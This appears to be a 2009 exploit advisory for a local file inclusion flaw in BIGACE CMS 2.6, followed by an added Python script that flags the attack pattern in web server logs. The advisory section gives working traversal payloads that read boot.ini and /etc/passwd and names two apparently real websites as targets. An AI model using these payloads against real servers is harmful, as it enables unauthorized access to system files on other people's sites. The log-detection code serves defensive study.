
# Title : BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability
# Published : 2009-06-30
# Author : CWD@rBe


-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script       : BIGACE 2.6
  
download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip
  
Author     : CWD@rBe
 
Special Thanks : www.cyber-warrior.org
 
***************************************************************************************************************
exploit:
 
http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len
 
example sites
 
1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
****************************************************************************************************************
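
Added example (not part of the original advisory and not BIGACE code): a log check for the request pattern shown above, flagging a cmd parameter that carries a ".." path segment or a NUL byte after percent-decoding. The combined log format, the sample lines and the function names are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo percent-encoding, repeating in case the value was encoded twice."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def cmd_findings(log_line):
    """Return the reasons the cmd parameter looks like a file-inclusion attempt."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    _, _, query = match.group(1).partition("?")
    values = [fully_decode(raw) for name, _, raw in
              (pair.partition("=") for pair in query.split("&")) if name == "cmd"]
    reasons = []
    # A ".." path segment (either slash style) climbs out of the include directory.
    if any(".." in re.split(r"[\\/]", v) for v in values):
        reasons.append("directory traversal")
    # A NUL byte has no place in a command name; older PHP truncates paths at it.
    if any("\x00" in v for v in values):
        reasons.append("null byte")
    return reasons

# Constructed sample lines (documentation addresses), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jun/2009:10:00:00 +0000] "GET /public/index.php?cmd=menu&id=1 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [30/Jun/2009:10:00:05 +0000] "GET /public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len HTTP/1.1" 200 311',
    '192.0.2.66 - - [30/Jun/2009:10:00:09 +0000] "GET /public/index.php?cmd=..%2F..%2Fetc%2Fpasswd%00&id=-1_tsearch_len HTTP/1.1" 200 1490',
    '192.0.2.10 - - [30/Jun/2009:10:00:12 +0000] "GET /public/index.php?cmd=v1..2&id=3 HTTP/1.1" 200 5120',
]

def scan(lines):
    """Return (1-based line number, reasons) for every suspicious line."""
    checked = ((n, cmd_findings(line)) for n, line in enumerate(lines, start=1))
    return [(n, reasons) for n, reasons in checked if reasons]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

The fourth sample line shows that dots inside an ordinary value are not reported; only a whole ".." segment between slashes counts.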
